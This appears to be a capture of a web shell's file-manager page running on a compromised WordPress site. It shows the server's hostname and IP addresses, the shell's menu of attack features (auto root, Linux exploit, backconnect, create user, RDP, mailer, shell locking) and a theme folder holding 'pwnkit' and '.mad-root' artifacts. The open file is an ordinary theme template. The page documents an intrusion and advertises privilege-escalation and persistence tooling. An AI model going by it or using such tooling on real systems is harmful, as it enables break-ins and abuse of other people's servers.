Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
qwery /
skins /
[ HOME SHELL ]
Name
Size
Permission
Action
construction
[ DIR ]
drwxrwxrwx
default
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
skins-admin.css
4.69
KB
-rwxrwxrwx
skins-admin.css.map
1.84
KB
-rwxrwxrwx
skins-admin.js
6.58
KB
-rwxrwxrwx
skins-admin.scss
3
KB
-rwxrwxrwx
skins-notice-missing.php
1.74
KB
-rwxrwxrwx
skins-notice.php
2.44
KB
-rwxrwxrwx
skins-options.php
7.17
KB
-rwxrwxrwx
skins.json
499
B
-rwxrwxrwx
skins.php
45.85
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : skins-notice-missing.php
<?php /** * The template to display Admin notices * * @package QWERY * @since QWERY 1.98.0 */ $qwery_skins_url = get_admin_url( null, 'admin.php?page=trx_addons_theme_panel#trx_addons_theme_panel_section_skins' ); $qwery_active_skin = qwery_skins_get_active_skin_name(); ?> <div class="qwery_admin_notice qwery_skins_notice notice notice-error"> <?php // Theme image $qwery_theme_img = qwery_get_file_url( 'screenshot.jpg' ); if ( '' != $qwery_theme_img ) { ?> <div class="qwery_notice_image"><img src="<?php echo esc_url( $qwery_theme_img ); ?>" alt="<?php esc_attr_e( 'Theme screenshot', 'qwery' ); ?>"></div> <?php } // Title ?> <h3 class="qwery_notice_title"> <?php esc_html_e( 'Active skin is missing!', 'qwery' ); ?> </h3> <div class="qwery_notice_text"> <p> <?php // Translators: Add a current skin name to the message echo wp_kses_data( sprintf( __( "Your active skin <b>'%s'</b> is missing. Usually this happens when the theme is updated directly through the server or FTP.", 'qwery' ), ucfirst( $qwery_active_skin ) ) ); ?> </p> <p> <?php echo wp_kses_data( __( "Please use only <b>'ThemeREX Updater v.1.6.0+'</b> plugin for your future updates.", 'qwery' ) ); ?> </p> <p> <?php echo wp_kses_data( __( "But no worries! You can re-download the skin via 'Skins Manager' ( Theme Panel - Theme Dashboard - Skins ).", 'qwery' ) ); ?> </p> </div> <?php // Buttons ?> <div class="qwery_notice_buttons"> <?php // Link to the theme dashboard page ?> <a href="<?php echo esc_url( $qwery_skins_url ); ?>" class="button button-primary"><i class="dashicons dashicons-update"></i> <?php // Translators: Add theme name esc_html_e( 'Go to Skins manager', 'qwery' ); ?> </a> </div> </div>
Close